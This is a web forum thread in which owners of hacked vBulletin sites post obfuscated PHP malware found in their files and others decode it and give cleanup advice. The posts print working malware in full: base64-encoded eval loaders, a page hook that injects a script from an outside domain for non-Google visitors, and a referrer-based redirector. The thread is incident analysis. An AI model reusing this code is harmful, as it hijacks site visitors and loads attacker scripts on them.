Announcement

Collapse
No announcement yet.

Site hacked - decode base64 please

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Site hacked - decode base64 please

    Found out this morning that every single PHP file on our server was changed to include base64 encode at the beginning of the file.

    Can someone decode for me please

    Code:
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZSIpKXsgcmV0dXJuIGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJbWgwZEhBNkx5OXpkMlZsY0hOMFlXdGxjMkZ1WkdOdmJuUmxjM1J6YVc1bWJ5NWpiMjB2YW5NdWNHaHdQM005TVNJK1BDOXpZM0pwY0hRKyIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>
    Digital-Forums: www.digital-forums.com | CK3 Games: www.ck3.co.uk

  • #2
    Code:
    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"google")){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3RzaW5mby5jb20vanMucGhwP3M9MSI+PC9zY3JpcHQ+");      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      [email protected](@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       [email protected]('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       [email protected]($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       [email protected]($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      [email protected](@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }
    here.

    #edit

    more inside
    Code:
    <script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>

    Comment


    • #3
      Thanks. All fixed now - now tracking down how, what, who, where, why
      Digital-Forums: www.digital-forums.com | CK3 Games: www.ck3.co.uk

      Comment


      • #4
        You can check your FTP log and see the IPs that modified the files. However, that is meaningless, the IPs could be from any part of the world and would most probably be a hacked system itself.

        In most cases, your FTP password is stolen from your system itself, either monitoring the key strokes or directly from saved password from your FTP client. Make sure that you clean your (and anyone else who has access to your login) system with more than one anti-virus/rootkit scanner etc. 90% of such hacking is caused by trojens getting access to your passwords. Clean up your system and change all passwords.
        Hosting Coupons: Hostmonster @ $3.95 and 20% off Mediatemple

        Comment


        • #5
          Seems like the same hack that affected thousands of Godaddy hosts earlier this year:

          http://sucuri.net/new-malware-sweeps...tsnow-com.html

          Comment


          • #6
            Hi,

            Would you please let me know how I can decode the following as well. They hack most of the vb files even though vb is on the latest release with no security issues on plugins etc.

            Code:
            <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1d1ZHTm1abmhrTTB3d1ExazFWMm93TDB4cVJtVlFkRmhWYzB0cmNYTXhSa0pRVEZOeVMwdzBjRmhXT1VKVVREQnZkSGxET0hGNVkzaE1WamxrVW5vd2FFNVVSV3QwUzJkaFRFWTBUMGt4VEhkVGIwaENlRU5XYUdoYWJrWktSVnBuU0ZwSlJVVlpSSGRSUnpGclQybFJXRmRDSzFOQ1JGbFRjV2hNUW1oTmFVSXhUVVp0UXl0c1NIUlNaRVZJWTFOR1EzQkJSR2wwTDFRME0wMVRVelZCZVc5RlZFSkNSVUZYVlVGQ2MwZHNjMVIwUTJkNVpsRXhaMUZrTmtNMVJVSktPRFp3Y2xkQlMwOUZZbUZSUFNjcEtTazdJRDgrUEQ4Z1pYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1dk1XdE9NVXRCZWtWUmFGWXJiRXhKZERCU1ZHSXpUR0ZXTkRONlkzZEpjRTR3VG1oMFRWcHJTaXN4UlZZNFpIbG1ZVmh2VkhwaldrbDZZemhxVTNsR1lsQjBSblk0Wm5aVVZEbDNhVzQxTlhob01uYzRZbkpOZWtRd01rRTRUMXBGVFRCUlZFMVJielZrT1RSUUwzZE9iSGxHU1ZSRmRWbHhVMlI0UmtWUU9VWkJjVW93VFhWclducGliMHRzZEdvMmFFcGhXbUo2VUdjMmFEQXlaMlYwY0dGRWFtUmlZbFZDV0M5T1NWTXdNemxqUlV4S1pEbFlheTlRTlRSdUwxSkRlVkJ4Yml0NmFrYzNaMGh5S3prMVZrMHdUMk5ETDFOd2RVcFpSemt4TVhORlJHWlFOM1pUTTJaT01XMTNTelJ3Tm10eGVtOW9Vek13ZW5wcWN6RnNjbFJSWVcxVlptTlJiSFZ5VlVoc1FuZHdhakZTVEhoNlkwUlNTbWxNYVc1NlJsVktWSFp3WldVd2NHMUZObHB4ZDNRd01qWkZiRGxITDBodU9TdEJZVmx6WlVKTlBTY3BLU2s3SUQ4K1BEOGdaWFpoYkNobmVuVnVZMjl0Y0hKbGMzTW9ZbUZ6WlRZMFgyUmxZMjlrWlNnblpVNXdPVEF3UlV4bmFrRlZkMUJIZGxWcFF6UlJVV1ptZWtSTGEyYzRSM0ZSTVZGek5ubEthbXg0U3poR1JXaENSVWczTTNSdVZqVjBZVEpVZVZCMmVHUklPREJYYlRFeWFUTktlbkZIVUZaMFEzRlhaRk5LU21RemRHTjZlVk5vZEVscE5uVXdjbTB3WVRoQ1UxZHFVazV0VW04MUwxSnNUR3BEVURGSlIweEZlR1l4ZFhGeU1sTjJRV3hHTVhoSmRUUlFPVVJKTHpaU2NGVnlkbkV5YXpKbFRUaG5SV3hwWkRRMllURnlla2h5VW5NMFNrVlZSUzlIVTAxRFVFOVVSRXBJVlZSNVlVbHFVREZyYVd0cWJVcDZhMmxGZWl0YVNWUk1NVVV3YVZGNVVVMUhhMHByUmtSQk5FMW5ZMHgzYkZScVVVZElVbXROTWxvd1drc3dabHBTSzFVdmExVTBUa0ZTUzBFd05FNW5aR0ZCV1RSUGRWUldMekpaTTFWalRHYzBNblZaYzFsVVp6WTFWMlZaWVN0S2VGQXhlVFIxZWk5aGRTODBOaXMzT1RsSlZWQmphU2NwS1NrNyIpKTsNCg=="));

            Comment


            • #7
              Online decoder here

              Comment


              • #8
                Actually decoding reviews its been encoded multiple times with various things, this site will do much better for you - http://www.unphp.net

                Using a combo of both sites i get-

                PHP Code:
                function fi($i){$a=Array("yahoo","bing","rambler","gogo","live.com","aport","nigma","webalta","begun.ru","stumbleupon.com","bit.ly","tinyurl.com","/yandex\.ru\/yandsearch\?(.*?)\&lr\=/","/google\.(.*?)\/url\?sa/","myspace.com","facebook.com","aol.com","cache","inurl","Location: http://primefmgh.com/components/com_banners/models/index.php");return $a[$i];}$GLOBALS['_fi_'][0](round(0));$rt_0=$GLOBALS['_fi_'][1]();if(!$rt_0){$rt_1=$_SERVER[HTTP_REFERER];$rt_2=$_SERVER[HTTP_USER_AGENT];if($GLOBALS['_fi_'][2]($rt_1,fi(0))or $GLOBALS['_fi_'][3]($rt_1,fi(1))or $GLOBALS['_fi_'][4]($rt_1,fi(2))or $GLOBALS['_fi_'][5]($rt_1,fi(3))or $GLOBALS['_fi_'][6]($rt_1,fi(4))or $GLOBALS['_fi_'][7]($rt_1,fi(5))or $GLOBALS['_fi_'][8]($rt_1,fi(6))or $GLOBALS['_fi_'][9]($rt_1,fi(7))or $GLOBALS['_fi_'][10]($rt_1,fi(8))or $GLOBALS['_fi_'][11]($rt_1,fi(9))or $GLOBALS['_fi_'][12]($rt_1,fi(10))or $GLOBALS['_fi_'][13]($rt_1,fi(11))or $GLOBALS['_fi_'][14](fi(12),$rt_1)or $GLOBALS['_fi_'][15](fi(13),$rt_1)or $GLOBALS['_fi_'][16]($rt_1,fi(14))or $GLOBALS['_fi_'][17]($rt_1,fi(15))or $GLOBALS['_fi_'][18]($rt_1,fi(16))){if(!$GLOBALS['_fi_'][19]($rt_1,fi(17))or!$GLOBALS['_fi_'][20]($rt_1,fi(18))){$GLOBALS['_fi_'][21](fi(19));exit();}}}











                //.end 
                Last edited by Joe D.; Thu 19th Dec '13, 5:58am.

                Comment


                • #9
                  Originally posted by Raptor View Post
                  Found out this morning that every single PHP file on our server was changed to include base64 encode at the beginning of the file.

                  Can someone decode for me please

                  Code:
                  <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZSIpKXsgcmV0dXJuIGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJbWgwZEhBNkx5OXpkMlZsY0hOMFlXdGxjMkZ1WkdOdmJuUmxjM1J6YVc1bWJ5NWpiMjB2YW5NdWNHaHdQM005TVNJK1BDOXpZM0pwY0hRKyIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>


                  Please see my post here: http://www.vbulletin.com/forum/forum...31#post4012531
                  Last edited by TheLastSuperman; Thu 19th Dec '13, 11:31pm.


                  Former vBulletin Support Staff
                  Hacked recently? See my blog post "Recovering a Hacked vBulletin Site".
                  Thinking outside the box? Need modification support? Visit www.vBulletin.org and have at it!
                  Need a Host? - I recommend URLJet

                  Comment

                  widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                  Working...
                  X